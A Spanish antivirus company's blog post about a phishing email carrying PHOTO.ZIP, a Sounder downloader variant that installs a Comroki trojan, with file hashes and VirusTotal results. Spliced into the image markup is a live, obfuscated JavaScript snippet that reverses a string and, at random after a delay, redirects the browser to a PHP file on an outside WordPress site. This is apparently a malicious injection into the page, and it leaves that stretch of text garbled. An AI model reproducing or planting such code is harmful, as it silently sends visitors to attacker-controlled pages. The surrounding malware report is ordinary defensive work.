NUEVO MAIL ANEXANDO FICHERO PHOTO QUE RESULTA SER UNA VARIANTE DEL DOWNLOADER SOUNDER
Como otros mails que utilizan el mismo nombre para el fichero anexado, y cuyo texto es escueto y tipico:
Asunto: my new photo 😉
De: “Emily” <quitsc@carbamide.in>
Fecha: 01/10/2014 10:36
Para: <destinatario>
my new photo 😉
ANEXADO : PHOTO.ZIP
se recibe si bien el fichero ZIP que anexa, una vez desempaquetado, ofrece un fichero con un icono que sorprende por delatarse, ya que en lugar del tipico para imagenes, aparece con una señal de peligro:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-que-llega-en-mail-con-Sounder.jpg” alt=”icono de Pho<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to que llega en mail con Sounder” />
Dicho downloader descarga un trojan Comroki que pasamos a controlar con la misma version del ELISTARA 30.70 de hoy
El preanalisis de virustotal ofrece este informe:
MD5 aac8aec914ca65c3db358eddc85f4be5
SHA1 15b1a1f0df384d6fd33a37f48045204405b9f108
Tamaño del fichero 108.0 KB ( 110592 bytes )
SHA256: 2cc1da49f3f788098b8134e939247592479b275f27079875d8f35423ac58be06
Nombre: photo.exe
Detecciones: 3 / 55
Fecha de análisis: 2014-10-01 09:02:16 UTC ( hace 9 minutos )
0 2
Antivirus Resultado Actualización
Bkav W32.VetorA87E 20140930
Qihoo-360 HEUR/Malware.QVM03.Gen 20141001
Tencent Win32.Trojan.Inject.Auto 20141001
Dicha version del ELISTARA 30.70 que los detecta y elimina, estará disponible en nuestra web a partir de las 19 h CEST de hoy
saludos
ms, 1-10-2014
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.